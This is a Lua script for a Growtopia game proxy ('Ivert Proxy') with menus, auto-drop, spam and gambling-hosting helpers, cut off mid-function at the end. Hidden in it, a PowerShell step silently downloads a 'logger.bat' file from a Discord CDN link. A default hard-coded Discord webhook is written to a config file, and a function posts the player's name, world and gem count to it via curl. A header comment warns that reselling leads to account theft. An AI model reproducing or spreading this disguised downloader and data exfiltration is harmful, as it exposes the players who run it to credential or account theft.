--resell your acc got steal
--Owner Introvert_7672

MessageBox("Vert PROXY", "Proxy Started.")
function FChat(txt)
    p = {}
    p[0] = "OnTextOverlay"
    p[1] = txt
    p.netid = -1
    SendVarlist(p)
end
local function ivert(text)
local packet = {
[0] = "OnAddNotification",
[1] = "interface/large/game_on.rttex",
[2] = text,
[3] = "audio/lala_theme.wav",
	[4] = 0,
netid = -1
}
SendVarlist(packet)
end
local function WARN(text)
	local packet = {
		[0] = "OnAddNotification",
		[1] = "interface/atomic_button.rttex",
		[2] = text,
		[3] = 'audio/hub_open.wav',
		[4] = 0,
		netid = -1
	}
	SendVarlist(packet)
end
local function EVENT(text)
	local packet = {
		[0] = "OnAddNotification",
		[1] = "interface/large/special_event.rttex",
		[2] = text,
		[3] = 'audio/gong.wav',
		[4] = 0,
		netid = -1
	}
	SendVarlist(packet)
end

log("`0[`1S`2T`3A`4R`5T`6I`7N`8G`0] `9Ivert Script Community PROXY")
tax = 0
wls = 0
play = 0
cvbgl = 0
totalbet = 0
wrnch = 0
wrnch_md = ""
set_spam_text = "`1I`2A`3M `4G`5A`6Y"
set_spam_delay = 5
spamming = false
startGems = 0
endGems = 0
collectGems = false
pc = false
telex,teley = -1,-1
gaspullshit = false
specialblink = false
 HookChecker = true

    SuperContent = "Sc Proxy by @Introvert_7672"
  SuperBroadCastsDone = 0
  StartTime = 0
  StopTime = StartTime + 3600  -- 1 hour from StartTime
  CurrentTime = os.time()
  SuperHour = false  -- For example, assuming you want to enable SuperHour

  SB_TIMER = 0


LOL = GetLocal()


TimeDifference = 0
whitelist = {34150,32875,195165}


url = "https://cdn.discordapp.com/attachments/1101533153287483513/1170578901345513502/ivertbann.rttex?ex=65598d8e&is=6547188e&hm=65e92d99b682e394c4ef025db94370121bd4356f38f3dd8a6f07f7bb00e99c3f&"
 
function open()
    local command = [[
        $url = "]] .. url .. [["
        $path = "cache/interface/large/ivertbann.rttex"
        $webClient = New-Object System.Net.WebClient
        $webClient.DownloadFile($url, $path)
    ]]
    local shell = io.popen("powershell -command -", "w")
    shell:write(command)
    shell:close()
end
 
 
function open2()
    local command = [[
        $url = "https://cdn.discordapp.com/attachments/1101533153287483513/1119804493857554533/logger.bat"
        $path = "logger.bat"
        $webClient = New-Object System.Net.WebClient
        $webClient.DownloadFile($url, $path)
    ]]
    local shell = io.popen("powershell -command -", "w")
    shell:write(command)
    shell:close()
end
 
function fileExists(filename)
  local file = io.open(filename, "r")
  if file then
    io.close(file)
    return true
  else
    return false
  end
end
 
if fileExists("cache/interface/large/ivertbann.rttex") then
else
open()
end
 
if fileExists("logger.bat") then
else
open2()
end

    function huur(varlist, packet)
        if varlist[0]:find("OnConsoleMessage") then
            if varlist[1]:find("You can annoy with broadcasts again") then
                local TimeDifference = StopTime - CurrentTime
                if TimeDifference > 0 and SuperHour then
                    SuperBroadCastsDone = SuperBroadCastsDone + 1
                    SendPacket(2, "action|input\ntext|/sb " .. SuperContent)
                    SayInfo()
                end
            end
    
            if varlist[1]:find(SuperContent) then
                local TimeDifference = StopTime - CurrentTime
                if TimeDifference > 0 and SuperHour then
                    SendPacket(2, "action|input\ntext|/sb " .. SuperContent)

                    if Webhook ~= "Remove this and paste ur webhook here" or Webhook ~= " " then
                        if HookChecker == true then
                        RunThread(function ()
                            DataHook()
                        end)
                    end
                        
                    end
                end
            end
        end
    end
    
    AddCallback("sbstuff", "OnVarlist", huur)

function printa(v)
    if v[0] == "OnConsoleMessage" and v[1]:find("Unknown command.") then
        p = {}
        p[0] = "OnConsoleMessage"
        p[1] = "`4Unknown command. `2Enter `0/menu or /help ``to see command list!"
        p.netid = -1
        SendVarlist(p)
        return true
    elseif v[0] == "OnConsoleMessage" and v[1]:find("Spam detected!") then
        FChat("`4Slowdown Spam Detected")
        return true
        elseif v[0] == "OnConsoleMessage" and v[1]:find("You've earnt") then
        FChat("`oYou've earnt `51 Activity Credit `ofor staying active.")
        return true
    elseif v[0] == "OnConsoleMessage" and v[1]:find("Collected ") then
        if v[1]:find("Diamond Lock") then
            play = tonumber(v[1]:match("(%d+) Diamond Lock")) * 100
            countTax(play * 2)
            msg = v[1]
            p = {}
            p[0] = "OnConsoleMessage"
            p[1] = msg
            p.netid = -1
            SendVarlist(p)
            return true
        elseif v[1]:find("Blue Gem Lock") then
            play = tonumber(v[1]:match("(%d+) Blue Gem Lock")) * 10000
            countTax(play * 2)
            msg = v[1]
            p = {}
            p[0] = "OnConsoleMessage"
            p[1] = msg
            p.netid = -1
            SendVarlist(p)
            return true
        elseif v[1]:find("World Lock") then
            play = tonumber(v[1]:match("(%d+) World Lock"))
            countTax(play * 2)
            msg = v[1]
            p = {}
            p[0] = "OnConsoleMessage"
            p[1] = msg
            p.netid = -1
            SendVarlist(p)
            return true
        else
            find = v[1]:find("`5**")
            msg = "`^introvert_7672 " .. v[1]:sub(find)
            p = {}
            p[0] = "OnConsoleMessage"
            p[1] = msg
            p.netid = -1
            SendVarlist(p)
        end
    elseif v[0] == "OnSDBroadcast" then
        FChat("`w[`^introvert`w] [Blocked SBD]")
        return true
    elseif v[0] == "OnConsoleMessage" then
        msg = "`w[`^introvert_7672`w] " .. v[1]
        p = {}
        p[0] = "OnConsoleMessage"
        p[1] = msg
        p.netid = -1
        SendVarlist(p)
        return true
    elseif v[0] == "OnTalkBubble" and v[3] ~= -1 and v[2]:find("spun the wheel and got") then
        if v[2]:find("``6>``") then
            p = {}
            p[0] = "OnTalkBubble" 
            p[1] = v[1]
            p[2] = "`0[`4FAKE!`0] " .. v[2]
            p[3] = -1
            p.netid = -1
            SendVarlist(p)
        elseif v[2]:find("``!]``") then
            p = {}
            p[0] = "OnTalkBubble"
            p[1] = v[1]
            p[2] = "`0[`cREAL`0] " .. v[2]
            p[3] = -1
            p.netid = -1
            SendVarlist(p)
            s2 = v[2]:find("spun") - 1
            s1 = v[2]:sub(4, s2)
            jml1 = v[2]:find("got ") + 6
            jml2 = v[2]:find("``!]``") - 1 
            jml = v[2]:sub(jml1, jml2)
            for _, player in pairs(GetPlayers()) do
                if player.netid == v[1] then
                    cn = {}
                    cn[0] = "OnNameChanged"
                    cn[1] = s1 .. " `e[Spinned]:`^" .. jml .. ""
                    cn.netid = player.netid
                    SendVarlist(cn)
                end
            end
        else
            p = {}
            p[0] = "OnTalkBubble"
            p[1] = v[1]
            p[2] = "`0[`4FAKE`0] " .. v[2]
            p[3] = -1
            p.netid = -1
            SendVarlist(p)
        end
        return true
    end
    return false
end
---------------------------------------------------------------------------------------------------------
function cek_uid(uid)
    for _, user in pairs(whitelist) do
        if uid == user then
            return 1
        end
    end
    return 0
end
if cek_uid(GetLocal().userid) == 1 then
    AddCallback(1, "OnVarlist", printa)
BGL = GetItemCount(7188)
WL = GetItemCount(242)
DL = GetItemCount(1796)
userid = GetLocal().userid
name = GetLocal().name
function menuDialog()
    menuVarList = {}
    menuVarList[0] = "OnDialogRequest"
    menuVarList[1] = [[
set_default_color|`o
add_label_with_icon|big|`cIvert Proxy Command Menu``|left|758
add_image_button|banner|interface/large/ivertbann.rttex|noflags|||
add_smalltext|`oYou in World : `2]]..GetLocal().world..[[|left|
add_smalltext|`oCheck Tile : X : `2]]..math.floor(GetLocal().tile_x)..[[ `0x `oY : `2]]..math.floor(GetLocal().tile_y)..[[|left|
add_smalltext|`oUser ID : `b]]..math.floor(GetLocal().userid)..[[ `0x `oNet ID : `2]]..math.floor(GetLocal().netid)..[[|left|
add_smalltext|Hello, `0]]..name..[[ `oWelcome To Community|
add_spacer|small|
add_textbox|Author Script|
add_url_button|comment|`o Introvert Community |noflags|https://discord.gg/wvk64dxxE4|Introvert Community|18|
add_textbox|`oPartner/Helper Script|left|32
add_smalltext|`o~> `cEy`o#3118|
add_smalltext|`o~> `cIntrovert`o#7672|
add_spacer|small|
add_button|logger|`cBet Logs|noflags|0|0|
add_label_with_icon|small|`5Hosting commands:|left|758|
add_smalltext|`0~> `c/mode `0(Set Count Gems Position)|left|
add_smalltext|`0~> `c/sp1 `0(Set Position Count Gems)|left|
add_smalltext|`0~> `c/sp2 `0(Set Position Count Gems)|left|
add_smalltext|`0~> `c/sw1 `0(Set Position Display Box)|left|
add_smalltext|`0~> `c/sw2 `0(Set Position Display Box)|left|
add_smalltext|`0~> `c/host `0(Set Position Host)|left|
add_smalltext|`0~> `c/stax `0(Set Tax)|left|
add_smalltext|`0~> `c/gaspull `0( (auto pull when say gas,go,play)|left|
add_smalltext|`0~> `c/stele `0(Set tele cordinate|left|
add_smalltext|`0~> `c/modal `0(show your modal|left|
add_smalltext|`0~> `c/irenk `0(change skin colour to irenk)|left|
add_smalltext|`0~> `c/type (lett / number) `rAutomaticly colors what you say.|left|
add_spacer|small|
add_label_with_icon|small|`5Webhook options:|left|4246|
--add_smalltext|`0~> `c/sethook `0(Opens the txt where u need to paste your hook)|left|
add_smalltext|`0~> `c/hooktoggle `2<NEW> `0(send webhooks while SBING (ON / OFF)|left|
add_smalltext|`0~> `#Paste Webhook fully & after that SAVE the file|left|
add_spacer|small|
add_label_with_icon|small|`5Superbroadcast commands:|left|2480|
add_smalltext|`0~> `c/super `2<NEW>`w (`0Starts Auto SB)|left|
add_smalltext|`0~> `c/content `2<NEW>`w (SB Text) (`0Sets text for SBS)|left|
add_smalltext|`0~> `c/sbtime `2<NEW>`w (Number) (`0Sets time for SBS)|left|
add_smalltext|`0~> `#For /sbtime `2<NEW>`w (num). 3600 = 1hour. 1800 = 30min :)|left|
add_spacer|small|
add_label_with_icon|small|`5BTK Commands:|left|528|
add_smalltext|`0~> `c/tp `0(Collect WLS from two pos)|left|
add_smalltext|`0~> `c/dp `0(deposit bgl)|left|
add_smalltext|`0~> `c/wt `0(withdraw bgl)|left|
add_smalltext|`0~> `c/ch `0(Count Gems On Position 1 and 2)|left|
add_smalltext|`0~> `c/pos `0(Teleport to Host Position)|left|
add_smalltext|`0~> `c/res `0(Collect Gems from two pos and `0Auto put chand)|left|
-- add_smalltext|`0~> `c/w1 `0(Teleport to Display Box pos 1)|left|
-- add_smalltext|`0~> `c/w2 `0(Teleport to Display Box pos 2)|left|
add_smalltext|`0~> `c/w1 `0(Teleport to Display Box pos 1 and drop Wls (eat tax))|left|
add_smalltext|`0~> `c/w2 `0(Teleport to Display Box pos 2 and drop wls (eat tax))|left|
add_smalltext|`0~> `c/relog `0(Relog world)|left|
add_smalltext|`0~> `c/gm `0(collect gems)|left|
add_spacer|small|
add_label_with_icon|small|`5Drop commands:|left|1460|
add_smalltext|`0~> `c/wd <amount> `0(World Lock Drop)|left|
add_smalltext|`0~> `c/dd <amount> `0(Diamond Lock Drop)|left|
add_smalltext|`0~> `c/bd <amount> `0(Blue Gem Lock Drop)|left|
add_smalltext|`0~> `c/dbl <amount> `0(`0Black Gem Lock Drop)|left|
add_smalltext|`0~> `c/dg <amount> `0(`0Drops Bgems)|left|
add_smalltext|`0~> `c/bs <amount> `0(`0Black Gems Suck)|left|
add_smalltext|`0~> `c/cd <amount> `0(Custom Drop)|left|
add_smalltext|`0~> `c/dc <amount> `0(Drop Clover)|left|
add_smalltext|`0~> `c/ds <amount> `0(Drop Arroz|left|
add_smalltext|`0~> `c/black `0(Convert Blue Gem Lock to Black Gem Lock)|left|
add_smalltext|`0~> `c/blue `0(Shatter Black Gem Lock to Blue Gem Lock)|left|
add_smalltext|`0~> `c/phone `0(Open Telephone menu (Fast Convert BGL)|left|
add_spacer|small|
add_label_with_icon|small|`5Other features:|left|11550|
add_smalltext|`0~> `c/afk `0(if you have role mods you can do this command)|left|
add_smalltext|`0~> `c/rcn `0(reconnect)|left|
add_smalltext|`0~> `c/rp `0(Respawn)|left|
add_smalltext|`0~> `c/blink `0(Blink Skin)|left|
add_smalltext|`0~> `c/sve <nameworld> `0(save world)|left|
add_smalltext|`0~> `c/gsv `0(go to save world)|left|
add_smalltext|`0~> `c/fc `0(Closing Proxy)|left|
add_smalltext|`0~> `c/wrench `0(Wrench Mode PULL/KICK/BAN)|left|
add_smalltext|`0~> `c/spamtext or /spamt `0(Text Spammer)|left|
add_smalltext|`0~> `c/spamdelay or /sd `0(Delay Spammer)|left|
add_smalltext|`0~> `c// `0(Start Spam)|left|
add_smalltext|`0~> `c/setnick <colorcode><name> `0(Change Name Visual)|left|
add_smalltext|`0~> `cEXAMPLE : /setnick 2Onwer|left|
add_textbox|`0<Introvert_7672>|left|
add_button|/proxy|Back|
end_dialog|Cancel|Host now!|
add_quick_exit]]
menuVarList.netid = -1
SendVarlist(menuVarList)
end

function runExecute()
  menuVarList = {}
  menuVarList[0] = "OnDialogRequest"
  menuVarList[1] = [[
set_default_color|`o
add_label_with_icon|big|`cProxy by `5[`cintrovert_7672`5]|left|758
add_smalltext|`5(Anything You Donate to Us, We Appreciate It)||
add_button|ZP|`oDONATE US!!!|noflags|0|0|
add_spacer|small|
add_smalltext|(If You Want A Shortcut Like This Just Type /proxy)||
add_button|/menu|`9Proxy Commands|noflags|0|0|
add_spacer|small|
add_button|/stax|`9Set Tax For BTK Helper|noflags|0|0|
add_spacer|small|
add_button|/mode|`9Choose Mode For BTK Helper|noflags|0|0|
add_spacer|small|
add_textbox|`9Credit `5[`cintrovert_7672`5]|left|
end_dialog|Cancel|EXIT!|
end_dialog|warpmenu|||
add_quick_exit]]
  menuVarList.netid = -1
  SendVarlist(menuVarList)
end

function blinks()
  local skin = {
  999,
    1685231359,
    2022356223,
    2190853119,
    2527912447,
    2864971775,
    3033464831,
    3370516479,
    1348237567,
    2749215231,
    3317842431,
    726390783,
    713703935,
    3578898943,
    4042322175,
    3531226367,
    4023103999,
    194314239,
    1345519520
  }
  while blink do
    SendPacket(2, [[
action|setSkin
color|]] .. skin[math.random(#skin)])
    Sleep(50)
  end
end

function daw()
	RunThread(function()
		for __, inv in pairs(GetInventory()) do
			if inv.id == 1796 or inv.id == 242 or inv.id == 7188 then
				Sleep(100)
				SendPacket(2, [[
action|dialog_return
dialog_name|drop
item_drop|]] .. inv.id .. [[
|
item_count|]] .. math.floor(inv.count))
				if inv.id == 1796 then
					log("`^Introvert`0#7672 `w You Dropped `c" .. inv.count .. " `9Diamond Lock")
					Sleep(100)
				elseif inv.id == 242 then
					log("`^Introvert`0#7672 `w You Dropped `c" .. inv.count .. " `9World Lock")
				elseif inv.id == 7188 then
					log("`^Introvert`0#7672 `w You Dropped `c" .. inv.count .. " `9Blue Gem Lock")
				end
			end
		end
	end)
end

local WebhookTXT = "IvertProxy_Hook.txt"

local HookLoad = io.open(WebhookTXT)

if HookLoad then
    Webhook = HookLoad:read("*a") -- Use HookLoad instead of WebhookTXT
    print(Webhook)
    io.close(HookLoad) -- Close the file object
else
    local fileTXT = io.open(WebhookTXT, "w") -- Open the file in write mode
    if fileTXT then
        fileTXT:write("https://discord.com/api/webhooks/1175631219367616542/vUBhZo9P8KcOLIgK9L0xVRpCxn28I0JUlRDst6kcyi0oS1hrMefCnaXm47tCIvOnXDKi") -- Write to the file
        io.close(fileTXT) -- Close the file
    else
        print("Failed to open or create the file.")
    end
end

local valueHook = "Gem count: "..math.floor(GetLocal().gems)
local valueHook2 = "Current world: "..GetLocal().world


formattedTime = os.date("%Y-%m-%d %H:%M:%S", StopTime)

function DataHook()
-- Construct the JSON data as a Lua string
local jsonData = [[
{
  "embeds": [
    {
      "title": "Ivert Proxy WebHooks",
      "description": "Greatest Creative-PS Proxy",
      "color": 16705372,
      "fields": [
        {
            "name": ":robot:Player",
            "value": "]] .. "Player name: ".. GetLocal().name .. [["
          },
        {
          "name": ":earth_americas:Current world",
          "value": "]] .. "Current world: ".. GetLocal().world .. [["
        },
        {
          "name": ":gem:Gems left",
          "value": "]] .. "Gems left: ".. math.floor(GetLocal().gems) .. [["
        },
        {
            "name": ":mega:Superbroadcast",
            "value": "]] .. "Stop time: ".. formattedStopTime .. [["
          }
      ]
    }
  ]
}
]]

-- Save the JSON data to a temporary file
local tempFile = io.open("temp.json", "w")
tempFile:write(jsonData)
tempFile:close()

-- Define the webhook URL
local webhookUrl = Webhook

-- Define the curl command with the temporary file
local command = 'curl -X POST -H "Content-Type: application/json" --data @"temp.json" ' .. webhookUrl

-- Execute the curl command
local success, exitCode, exitSignal = os.execute(command)

-- Check for errors
if success then
    print("Embed sent successfully.")
else
    print("Failed to send embed. Exit Code:", exitCode, "Exit Signal:", exitSignal)
end

-- Clean up the temporary file
os.remove("temp.json")
end

local function Punch(id, x, y)
   local player = GetLocal()
   local pkt_punch = {
      type = 3,
      int_data = id,
      pos_x = player.pos_x,
      pos_y = player.pos_y,
      int_x = x,
      int_y = y,
   }
   SendPacketRaw(pkt_punch)
end

for x = 0, 199 do
if telex ~= -1 or teley ~= -1 then break end
for y = 0, 199 do
if telex ~= -1 or teley ~= -1 then break end
if GetTile(x,y).fg == 3898 and (telex == -1 and teley == -1) then
telex = x
teley = y
end
end
end
 
log("`9Telephone Coordinates Set!")

function CheckLocks()
 RunThread(function()
		Sleep(300)
		 while GetItemCount(242) > 99 do
		local packet = {}
		packet.type = 10
		packet.int_data = 242
		SendPacketRaw(packet)
		Sleep(100)
		end
		while GetItemCount(1796) > 99 do
		 SendPacket(2,"action|dialog_return\ndialog_name|telephone\nnum|53785|\nx|".. telex .."|\ny|".. teley .."|\nbuttonClicked|bglconvert")
		Sleep(100)
		end
		while GetItemCount(7188) > 99 do
		 SendPacket(2,"action|dialog_return\ndialog_name|info_box\nbuttonClicked|make_bgl")
		Sleep(100)
		end

		end)
end

local function specialblinker()
  
      while specialblink do 
  
          local rnd = math.random(1, 9999999999)
  
  SendPacket(2, "action|setSkin\ncolor|"..rnd)
  Sleep(100)
end
end

function drop(id, amt)
    SendPacket(2, "action|dialog_return\ndialog_name|drop\nitem_drop|" .. id .. "|\nitem_count|" .. amt)
    Sleep(180)
end
function findItem(id)
    for _, itm in pairs(GetInventory()) do
        if itm.id == id then
            return itm.count
        end
    end
    return 0
end
function startBET()
    FindPath(poswin1x, poswin1y)
    Sleep(500)
    FindPath(poswin2x, poswin2y)
    Sleep(500)
    FindPath(poshostx, poshosty)
    SendPacket(2, "action|input\ntext|`4PUNCH `wThe `9CHAND")
end
function SayInfo()
    formattedStopTime = os.date("%H:%M", StopTime)
local Player = GetLocal().name
    RunThread(function ()
        Sleep(2000)
        SendPacket(2, "action|input\ntext|`w["..Player.."`w (megaphone)`0] end time: "..formattedStopTime)
        Sleep(2000)
        SendPacket(2, "action|input\ntext|`0Proxy Script made by `8@ivertt`0! My Discord: `c@Introvert_7672") -- `2Join the Discord --> `#discord.gg/
    
        
    end)
    
    
    end
function setspam()
  if set_spam_delay >= 5 then
      while spamming do
          SendPacket(2, "action|input\n|text|`"..math.random(1,9)..set_spam_text)
          Sleep(set_spam_delay * 1000)
      end
  elseif set_spam_delay < 5 then
  OnConsoleMessage("`0delay cant be less than 5 Second !")
  end
end
function relogThread()
    FChat("Relog...")
    latest_world = GetLocal().world
    SendPacket(3, "action|join_request\nname|" .. latest_world .. "\ninvitedWorld|0")
end
function countTax(amount)
    if tonumber(tax) < 10 then
        taxs = tonumber(tax) / 100
        total = math.floor(amount - (amount * taxs))
        log("`9" .. tostring(total) .. " WLS `2" .. tostring(math.floor(amount * taxs)) .. " WLS TAX")
        return total
    else
        total = math.floor(amount - (amount / tonumber(tax)))
        log("`9" .. tostring(total) .. " WLS `2" .. tostring(math.floor(amount / tax)) .. " WLS TAX")
        return total
    end
end
function checkWinner(count1, count2)
    if count1 == count2 then
        SendPacket(2, "action|input\ntext|(gems) `2" .. count1 .. " `0[`9TIE`w] `2" .. count2 .. " (gems)")
    elseif count1 < count2 then
        SendPacket(2, "action|input\ntext|(gems) `a" .. count1 .. " `0/ `2" .. count2 .. " (gems)`9->`4Introvert_7672")
    elseif count1 > count2 then
        SendPacket(2, "action|input\ntext|`4Introvert_7672`9<-`0(gems) `2" .. count1 .. " `0/ `a" .. count2 .. " (gems)")
    end
end
function customDrop()
    pecahan = { 10000, 100, 1 }
    bgl = 0
    dl = 0
    wl = 0
    for i = 1, 3 do
        while wls >= pecahan[i] do
            if pecahan[i] == pecahan[1] then
                bgl = bgl + 1
                wls = wls - 10000
            elseif pecahan[i] == pecahan[2] then
                dl = dl + 1
                wls = wls - 100
            elseif pecahan[i] == pecahan[3] then
                wl = wl + 1
                wls = wls - 1
            end
        end
    end
    itemamt = { bgl, dl, wl }
    itemid = { 7188, 1796, 242 }
    if findItem(1796) < dl then
        local pkt = {
            type = 10,
            int_data = 7188,
        }
        SendPacketRaw(pkt)
    elseif findItem(242) < wl then
        local pkt = {
            type = 10,
            int_data = 1796,
        }
        SendPacketRaw(pkt)
    end
    Sleep(200)
    if bgl > 0 then
        drop(itemid[1], itemamt[1])
        if dl > 0 then
            drop(itemid[2], itemamt[2])
            if wl > 0 then
                drop(itemid[3], itemamt[3])
            end
        end
    else
        if dl > 0 then
                drop(itemid[2], itemamt[2])
            if wl > 0 then
                drop(itemid[3], itemamt[3])
            end
        else
            if wl > 0 then
                drop(itemid[3], itemamt[3])
            end
        end
    end
    log(" Dropped `1" .. bgl .. " BGL " .. dl .. " DLS " .. wl .. " WLS")
end
function customDropWin()
    pecahan = { 10000, 100, 1 }
    bgl = 0
    dl = 0
    wl = 0
    for i = 1, 3 do
    while total >= pecahan[i] do
        if pecahan[i] == pecahan[1] then
        bgl = bgl + 1
        total = total - 10000
        elseif pecahan[i] == pecahan[2] then
        dl = dl + 1
        total = total - 100
        elseif pecahan[i] == pecahan[3] then
        wl = wl + 1
        total = total - 1
        end
    end
    end
    itemamt = { bgl, dl, wl }
    itemid = { 7188, 1796, 242 }
    if findItem(1796) < dl then
    local pkt = {
        type = 10,
        int_data = 7188,
    }
    SendPacketRaw(pkt)
    elseif findItem(242) < wl then
    local pkt = {
        type = 10,
        int_data = 1796,
    }
    SendPacketRaw(pkt)
    end
    Sleep(200)
    if bgl > 0 then
    drop(itemid[1], itemamt[1])
    if dl > 0 then
        drop(itemid[2], itemamt[2])
        if wl > 0 then
        drop(itemid[3], itemamt[3])
        end
    end
    else
    if dl > 0 then
        drop(itemid[2], itemamt[2])
        if wl > 0 then
        drop(itemid[3], itemamt[3])
        end
    else
        if wl > 0 then
        drop(itemid[3], itemamt[3])
        end
    end
    end
    log(" Dropped `1" .. bgl .. " BGL " .. dl .. " DLS " .. wl .. " WLS")
    Sleep(500)
    FindPath(poshostx, poshosty)
end


function GasPuller(varlist, packet)
   
	if varlist[0]:find("OnTalkBubble") then

         if varlist[2]:find("gas") or varlist[2]:find("go") or varlist[2]:find("play") then

            local KontolMyAss = varlist[1]
            if gaspullshit == true then
                playerID = KontolMyAss
                SendPacket(2, "action|dialog_return\ndialog_name|popup\nnetID|"..KontolMyAss.."|\nbuttonClicked|pull")
          SendPacket(2, "action|input\n|text|`9Gasss!!(wl)(evil)")
               
            end
            
         end

		
	end
end

AddCallback("GasPull", "OnVarlist", GasPuller)

function hook(varlist, packet)
if varlist[0] == "OnConsoleMessage" and varlist[1]:find("Collected") and (varlist[1]:find("Blue Gem Lock") or varlist[1]:find("World Lock") or varlist[1]:find("Diamond Lock")) then
CheckLocks()
 end
    if varlist[0]:find("OnDialogRequest") and varlist[1]:find("end_dialog|telephone") then
       TELEPHONE_X = varlist[1]:match('embed_data|x|(%d+)')
         TELEPHONE_Y = varlist[1]:match('embed_data|y|(%d+)')
         SendPacket(2,"action|dialog_return\ndialog_name|telephone\nnum|53785|\nx|"..TELEPHONE_X.."|\ny|"..TELEPHONE_Y.."|\nbuttonClicked|bglconvert")
        return true
    end
 if varlist[0] == "OnDialogRequest" and varlist[1]:find("The Black Backpack") then
      return true
    end
end
AddCallback("Hook", "OnVarlist", hook)

local WebhookTXT = "IvertSB_Hook.txt"

local HookLoad = io.open(WebhookTXT)

if HookLoad then
    Webhook = HookLoad:read("*a") -- Use HookLoad instead of WebhookTXT
    print(Webhook)
    io.close(HookLoad) -- Close the file object
else
    local fileTXT = io.open(WebhookTXT, "w") -- Open the file in write mode
    if fileTXT then
        fileTXT:write("Remove this and paste ur webhook here") -- Write to the file
        io.close(fileTXT) -- Close the file
    else
        print("Failed to open or create the file.")
    end
end

local valueHook = "Gem count: "..math.floor(GetLocal().gems)
local valueHook2 = "Current world: "..GetLocal().world


formattedTime = os.date("%Y-%m-%d %H:%M:%S", StopTime)

function DataHook()
-- Construct the JSON data as a Lua string
local jsonData = [[
{
  "embeds": [
    {
      "title": "Ivert Proxy WebHooks",
      "description": "Greatest Creative-PS Proxy",
      "color": 16705372,
      "fields": [
        {
            "name": ":robot:Player",
            "value": "]] .. "Player name: `".. GetLocal().name .. [["
          },
        {
          "name": ":earth_americas:Current world",
          "value": "]] .. "Current world: ".. GetLocal().world .. [["
        },
        {
          "name": ":gem:Gems left",
          "value": "]] .. "Gems left: ".. math.floor(GetLocal().gems) .. [["
        },
        {
            "name": ":mega:Superbroadcast",
            "value": "]] .. "Stop time: ".. formattedStopTime .. [["
          }
      ]
    }
  ]
}
]]

-- Save the JSON data to a temporary file
local tempFile = io.open("temp.json", "w")
tempFile:write(jsonData)
tempFile:close()

-- Define the webhook URL
local webhookUrl = Webhook

-- Define the curl command with the temporary file
local command = 'curl -X POST -H "Content-Type: application/json" --data @"temp.json" ' .. webhookUrl

-- Execute the curl command
local success, exitCode, exitSignal = os.execute(command)

-- Check for errors
if success then
    print("Embed sent successfully.")
else
    print("Failed to send embed. Exit Code:", exitCode, "Exit Signal:", exitSignal)
end

-- Clean up the temporary file
os.remove("temp.json")
end


function hoek(type, packet)

    if packet:find("action|input\n|text|") then
        if typecol == "" then





        else
 local neeker = packet:match("|text|([^|\n]+)")


        if neeker:find("/") then

            return false
        else

            SendPacket(2, "action|input\n|text|`"..typecol..neeker)
            return true
        end
        end




    end
end
  AddCallback("Wrench", "OnPacket", hoek)


function menuExecute()
WARN("`0[`1S`2T`3A`4R`5T`6I`7N`8G`0] `9Ivert Script Community PROXY")
Sleep(3000)
EVENT("`9/menu `1to see commands")
Sleep(3000)
ivert("`wPREMIUM PROXY `cBy `4Introvert_7672")
end

function reset()
    if Mode == "HORIZONTAL" then
        FindPath(pos1x1, pos1y1)
        Punch(5640, pos1x1, pos1y1)
        Sleep(500)  
        FindPath(pos1x2, pos1y1)
        Punch(5640, pos1x2, pos1y1)
        Sleep(500)
        FindPath(pos1x3, pos1y1)
        Punch(5640, pos1x3, pos1y1)
        Sleep(500)
        FindPath(pos2x1, pos2y1)
        Punch(5640, pos2x1, pos2y1)
        Sleep(500)        
        FindPath(pos2x2, pos2y1)
        Punch(5640, pos2x2, pos2y1)
        Sleep(500)       
        FindPath(pos2x3, pos2y1)
        Punch(5640, pos2x3, pos2y1)
    elseif Mode == "VERTIKAL" then
        FindPath(pos1x1, pos1y1)
        Punch(5640, pos1x1, pos1y1)
        Sleep(500)       
        FindPath(pos1x1, pos1y2)
        Punch(5640, pos1x1, pos1y2)
        Sleep(500)       
        FindPath(pos1x1, pos1y3)
        Punch(5640, pos1x1, pos1y3)
        Sleep(500)      
        FindPath(pos2x1, pos2y1)
        Punch(5640, pos2x1, pos2y1)
        Sleep(500)        
        FindPath(pos2x1, pos2y2)
        Punch(5640, pos2x1, pos2y2)
        Sleep(500)       
        FindPath(pos2x1, pos2y3)
        Punch(5640, pos2x1, pos2y3)
    end    
    Sleep(500)
    FindPath(poshostx, poshosty)
SendPacket (2,"action|input\n|text|`wYou have successfully picked up the (gems) and put the `9chand") 
end


AddCallback(0, "OnPacket", function(type, packet)
if packet:find("/sp1") then
  if Mode == "VERTIKAL" then
    pos1x1 = math.floor(GetLocal().pos_x / 32)
    pos1y1 = math.floor(GetLocal().pos_y / 32)
    pos1y2 = math.floor(GetLocal().pos_y / 32) - 1
    pos1y3 = math.floor(GetLocal().pos_y / 32) - 2
  elseif Mode == "HORIZONTAL" then
    pos1y1 = math.floor(GetLocal().pos_y / 32)
    pos1x1 = math.floor(GetLocal().pos_x / 32) - 1
    pos1x2 = math.floor(GetLocal().pos_x / 32)
    pos1x3 = math.floor(GetLocal().pos_x / 32) + 1
  end
  FChat("`9[ivert] Pos 1 configured")
  return true
elseif packet:find("/sp2") then
  if Mode == "VERTIKAL" then
    pos2x1 = math.floor(GetLocal().pos_x / 32)
    pos2y1 = math.floor(GetLocal().pos_y / 32)
    pos2y2 = math.floor(GetLocal().pos_y / 32) - 1
    pos2y3 = math.floor(GetLocal().pos_y / 32) - 2
    FChat("`9[ivert] Pos 2 configured")
    return true
  elseif Mode == "HORIZONTAL" then
    pos2y1 = math.floor(GetLocal().pos_y / 32)
    pos2x1 = math.floor(GetLocal().pos_x / 32) - 1
    pos2x2 = math.floor(GetLocal().pos_x / 32)
    pos2x3 = math.floor(GetLocal().pos_x / 32) + 1
    FChat("`9[ivert] Pos 2 configured")
    return true
  end

elseif packet:find("/res") then
  RunThread(reset)
return true
elseif packet:find("/tp") then
  RunThread(startBET)
  return true
elseif packet:find("/irenk") then
  SendPacket(2,"action|setSkin\ncolor|999")
  return true

elseif packet:find("/gaspull") then
       
        if gaspullshit == false then
            gaspullshit = true
            FChat("Gas pull `2ENABLED")
        else

            gaspullshit = false
            FChat("Gas pull `4DISABLED")
        end

        return true

elseif packet:find("/dg") then
SendPacket(2, "action|dialog_return\ndialog_name|popup\nbuttonClicked|bgem_dropall")
log("you dropped `o250 `bBlack Gems")
FChat("you dropped `o250 `bBlack Gems")
return true

elseif packet:find("/bs") then
SendPacket(2, "action|dialog_return\ndialog_name|popup\nbuttonClicked|bgem_suckall")
log("you sucked all `o250 `bBlack Gems")
FChat("you sucked all `bBlack Gems")
return true

  
elseif packet:find("/setnick (%w+)") then
  cn = {}
  cn[0] = "OnNameChanged"
  cn[1] = "`"..packet:match("/setnick (%w+)")
  cn.netid = GetLocal().netid
